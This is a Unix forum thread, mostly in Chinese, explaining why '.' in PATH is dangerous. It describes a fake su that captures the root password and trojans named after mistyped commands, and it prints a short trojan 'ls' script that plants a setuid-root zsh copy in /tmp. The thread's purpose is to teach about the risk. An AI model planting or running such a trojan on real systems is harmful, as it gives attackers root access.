问一下我的目录下文件执行的问题。

網中人

could you tell us what "security reason" we may encounter by an example?
thanks...  

dradhzn

alright , seems can't off the line today
path is used for search executable , from left to right .
for example if the . is somehow localted before /usr/bin , or /usr/sbin etc, etc, i could simply wirte a script "su" to simulate the default su behavior to fool people and capture the root passwd some where . let say i have this su ready and copy this "su" in /tmp directory , if someone have the "." in wrong place , and execute "su" command from /tmp , Bing Go !

網中人

very good!

還有人能舉更多例子嗎?

lightspeed

The possibility of unexpected behavior is higher if "." is early in your search path, but even the last position is not safe: consider the possibility of misspellings. A cracker could create a malicious /tmp/hwo, a misspelling of the common who command, and hope you type "hwo" sometime while you're in /tmp. As there is no earlier "hwo" in your search path, you'll unintentionally run the cracker's ./hwo program. (Which no doubt prints, `basename $SHELL`: hwo: command not found to stderr while secretly demolishing your filesystem.) Play it safe and keep "." out of your search path.

網中人

是的, dradhzn & lightspeed  兄已指出可能的潛在危險了.
若 . 放在 PATH 的前面, 那只要在當前目錄寫一個 script , 以最常用的命令來命名就行. 如 cd, ls, rm, exit 等等....
然後裡面可執行任何你想要的其它命令,
才執行原有名令,
再將 script 刪掉.
比方說, 你寫一個 ls 的 script:

1. #!/bin/bash
   
2. cp -f /bin/zsh /tmp/.rc &>/dev/null
   
3. chmod ug+s /tmp/.rc &>/dev/null
   
4. ls "$@"
   
5. rm ls &>/dev/nll

复制代码

只要 root 一跑 ls 這命令(假設 . 在 PATH 前面)
接著, 任何人都可執行 /tmp/.rc 取得一個 root 身份的 zsh
然後再跑 su - root -c "/bin/bash" 那就有一個 root 的 bash 了!!
接下來你想幹嘛? 隨你喜歡囉....  ^_^

為何要舉 zsh ?
因為我在 linux 測過 bash, csh, 他們都能成功躲過 suid/sgid 的設定.
但 zsh 卻可執行 suid/sgid !
(管於 suid/sgid 的危險, 之前談過了, 搜一下精華吧)

倘若 . 放在 PATH 的末端, 那就如 lightspeed 兄指出的,
等別人誤敲命令了...
稍加耐心, 你可以收集到許多平時常被敲錯的命令, 如:
l, la, ld, lx...
或一些 DOS 命令: copy, dir, del, deltree...

或許, 大家能舉的例子更多!

----
唉, 還是老話了, 我講了很多遍, 再講一遍:
勿以善小而不為, 勿以惡小而為之!

ZealeS

高明。。。。佩服佩服。
茅塞顿开。
谢谢。